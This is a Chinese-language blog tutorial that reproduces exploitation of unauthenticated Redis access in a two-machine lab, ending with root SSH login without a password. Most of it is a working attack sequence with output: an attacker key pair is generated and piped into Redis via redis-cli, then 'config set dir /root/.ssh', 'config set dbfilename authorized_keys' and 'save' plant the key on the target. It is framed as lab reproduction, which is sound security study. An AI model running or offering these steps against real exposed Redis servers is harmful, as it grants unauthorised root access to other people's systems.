Redis未授权访问漏洞利用-ssh免密登录

漏洞的产生条件

(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略,直接暴露在公网;

(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。 

重现环境

  • 靶机:

1、centos6.5-32bit,ip地址192.168.10.136

2、redis-3.2.9

(2.1)源码编译安装redis,出现错误

In file included from adlist.c:34:
zmalloc.h:50:31: error: jemalloc/jemalloc.h: No such file or directory
zmalloc.h:55:2: error: #error “Newer version of jemalloc required”

编译 redis 报错 error: jemalloc/jemalloc.h: No such file or directory

原因是jemalloc重载了Linux下的ANSI C的malloc和free函数。

解决办法:make时添加参数。 

make MALLOC=libc
make install
mkdir /etc/redis
cp redis.conf /etc/redis/

(2.2)redis配置文件

vi /etc/redis/redis.conf

注释#bind 127.0.0.1

protected-mode 改为no

protected-mode no

  • 攻击机:

centos6.5-32bit,ip地址192.168.10.172

(1)、生成密钥对。

ssh-keygen -t rsa

# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
6d:54:ad:98:e8:04:52:47:e4:c3:d3:d5:e7:57:4c:f3 root@localhost.localdomain
The key’s randomart image is:
+–[ RSA 2048]—-+
| ..o+ oo +.|
| . .+ . o o *|
| . .=.oo . oE|
| o=o . o|
| oS o .|
| .. |
| |
| |
| |
+—————–+

在/root/.ssh/目录下生成id_rsa(密钥),id_rsa.pub(公钥)文件

(2)、将公钥内容存储到redis

(echo -e “\n\n”;cat /root/.ssh/id_rsa.pub;echo -e “\n\n”;) | /usr/local/bin/redis-cli -h 192.168.10.136 -x set redis_ssh_test

[root@localhost .ssh]# (echo -e “\n\n”;cat /root/.ssh/id_rsa.pub;echo -e “\n\n”;) | /usr/local/bin/redis-cli -h 192.168.10.136 -x set redis_ssh_test
OK

(3)、redis-cli远程连接redis,设置存储路径,并存储

/usr/local/bin/redis-cli -h 192.168.10.136

config set dir /root/.ssh  注意:靶机上/root/.ssh目录必须已经存在,否则设置不成功,提示(error) ERR Changing directory: No such file or directory

192.168.10.136:6379> config set dir /root/.ssh
OK
192.168.10.136:6379> config get dir
1) “dir”
2) “/root/.ssh”
192.168.10.136:6379> config set dbfilename authorized_keys
OK
192.168.10.136:6379> config get dbfilename
1) “dbfilename”
2) “authorized_keys”

192.168.10.136:6379> save
OK
192.168.10.136:6379> exit

  • 最后

ssh root@192.168.10.136,执行后直接连接到靶机。

注意centos系统ssh免密登录需要关闭selinux

相关文档:

Redis未授权访问漏洞的重现与利用

Copyright © 2017 ITGATHER.COM - 闽ICP备19016859号-1
扫二维码--> 返回顶部